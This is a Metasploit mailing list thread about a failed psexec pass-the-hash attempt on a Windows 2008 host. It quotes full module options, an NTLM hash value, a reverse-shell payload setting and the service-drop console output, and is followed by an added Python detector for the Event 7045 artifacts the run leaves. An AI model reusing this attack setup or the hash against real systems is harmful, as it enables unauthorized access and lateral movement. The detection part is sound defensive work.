Metasploit mailing list archives

Re: psexec


From: Enis Sahin <enis.c.sahin () gmail com>
Date: Thu, 20 Oct 2011 08:54:56 +0300

Could be because "Vista/Win7/2008 with UAC drops admin privs on SMB shares for local users, which prevents the psexec module from writing its executable/service to the remote host when using a local admin credential."

Source: http://dev.metasploit.com/redmine/issues/5316

Enis

On 19/10/2011, audio audience <audience099 () gmail com> wrote:
Hello All,
I have a remote system. It is running Win2k8 x86 and I have all users' hashes.
However, I ran the psexec exploit but it did not succeed.

- Disabled antivirus
- Checked that the registry key "RequireSecuritySignature" is set to "0".
http://www.offensive-security.com/metasploit-unleashed/PSexec_Pass_The_Hash

Do you have any idea about this?

msf  exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting                                                 Required  Description
   ----       ---------------                                                 --------  -----------
   RHOST      [IP Address]                                                    yes       The target address
   RPORT      445                                                             yes       Set the SMB service port
   SHARE      ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP                                                       no        The Windows domain to use for authentication
   SMBPass    aad3bxxxxxxxxxx33435b61404ee:a7649e53c5d07306b78bfc7b2029a798  no        The password for the specified username
   SMBUser    Administrator                                                   no        The username to authenticate as


Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     0.0.0.0          yes       The listen address
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(psexec) > exploit

[*] Started reverse handler on 0.0.0.0:4443
[*] Connecting to the server...
[*] Authenticating to [IP Address]:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \uqSjtJEP.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[IP Address][\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[IP Address][\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (nGbXrAdw - "MUQefrtYtKijwX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \uqSjtJEP.exe...
[*] Exploit completed, but no session was created.
msf  exploit(psexec) >



-- 
http://www.enissahin.com | http://twitter.com/enis_sahin
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
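The quoted run shows what the psexec module leaves behind on the target even when no session comes back: a randomly named executable written to ADMIN$ (the system root), a randomly named service created and started through svcctl, and then both removed. On the target that sequence produces a System log Event ID 7045 ("A service was installed in the system") with exactly those names. The following is an added detection example, not code from the thread or from Metasploit: it parses constructed key="value" renderings of 7045 records (the service and file names in the first two lines are the ones printed in the quoted run, the benign rows and the 192.0.2.10 host are made up) and flags installs whose service name and binary look machine-generated and whose binary sits directly in the system root. The name heuristics (case-shuffling and vowel ratio) and the two-signal threshold are assumptions chosen for this example, not a Metasploit or Windows convention.

```python
import re

# Constructed sample records shaped like Windows System log Event ID 7045
# ("A service was installed in the system"), flattened to one key="value"
# line each. The service and file names in the first two lines are the ones
# printed by the psexec run quoted in the thread; the other lines are benign
# fillers made up for this example. 192.0.2.10 is a documentation address.
SAMPLE_EVENTS = r'''
EventID="7045" ServiceName="nGbXrAdw" ImagePath="%SYSTEMROOT%\uqSjtJEP.exe" Account="LocalSystem"
EventID="7045" ServiceName="MUQefrtYtKijwX" ImagePath="\\192.0.2.10\ADMIN$\uqSjtJEP.exe" Account="LocalSystem"
EventID="7045" ServiceName="Spooler" ImagePath="C:\Windows\System32\spoolsv.exe" Account="LocalSystem"
EventID="7045" ServiceName="MyBackupAgent" ImagePath="C:\Program Files\Vendor\agent.exe" Account="LocalSystem"
EventID="7036" ServiceName="Spooler" ImagePath="" Account=""
'''

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

# A binary sitting directly in the system root (which is what the ADMIN$
# share maps to) with no sub-directory: %SYSTEMROOT%, %WINDIR%, a
# drive-letter \Windows path, or a UNC path into ADMIN$.
SYSROOT_EXE_RE = re.compile(
    r'^(?:%SYSTEMROOT%|%WINDIR%|[A-Za-z]:\\Windows|\\\\[^\\]+\\ADMIN\$)\\([^\\]+)\.exe$',
    re.IGNORECASE,
)


def irregular_caps(name):
    """Count uppercase letters after the first character that are not followed
    by at least two lowercase letters. CamelCase words ("MyBackupAgent") score
    0; case-shuffled strings ("nGbXrAdw") score higher."""
    count = 0
    for i in range(1, len(name)):
        if name[i].isupper():
            tail = name[i + 1:i + 3]
            if len(tail) < 2 or not tail.islower():
                count += 1
    return count


def vowel_ratio(name):
    return sum(c in "aeiouAEIOU" for c in name) / max(len(name), 1)


def looks_random(name):
    """Assumed heuristic for generated names: purely alphabetic, 6-16
    characters, and either case-shuffled or vowel-starved."""
    if not name.isalpha() or not 6 <= len(name) <= 16:
        return False
    return irregular_caps(name) >= 2 or vowel_ratio(name) < 0.2


def parse_event(line):
    return dict(FIELD_RE.findall(line))


def score_service_install(event):
    """Return the reasons an Event 7045 record resembles a psexec-style
    service drop; an empty list means nothing stood out."""
    reasons = []
    if event.get("EventID") != "7045":
        return reasons
    if looks_random(event.get("ServiceName", "")):
        reasons.append("random-looking service name")
    m = SYSROOT_EXE_RE.match(event.get("ImagePath", "").strip('"'))
    if m:
        reasons.append("binary dropped directly in the system root / ADMIN$")
        if looks_random(m.group(1)):
            reasons.append("random-looking binary name")
    return reasons


def find_suspicious(log_text, min_reasons=2):
    """Scan key="value" event lines and return {service_name: reasons} for
    records that trip at least min_reasons signals."""
    hits = {}
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        reasons = score_service_install(ev)
        if len(reasons) >= min_reasons:
            hits[ev["ServiceName"]] = reasons
    return hits


if __name__ == "__main__":
    for name, why in find_suspicious(SAMPLE_EVENTS).items():
        print(f"{name}: {', '.join(why)}")
```

Run against the constructed events, the two psexec-style rows are reported with three reasons each while the Print Spooler and vendor-agent installs pass. Because the quoted run also shows the service being started and deleted within the same second, pairing 7045 with the matching Service Control Manager start/removal events for the same name would tighten the rule further on a real log.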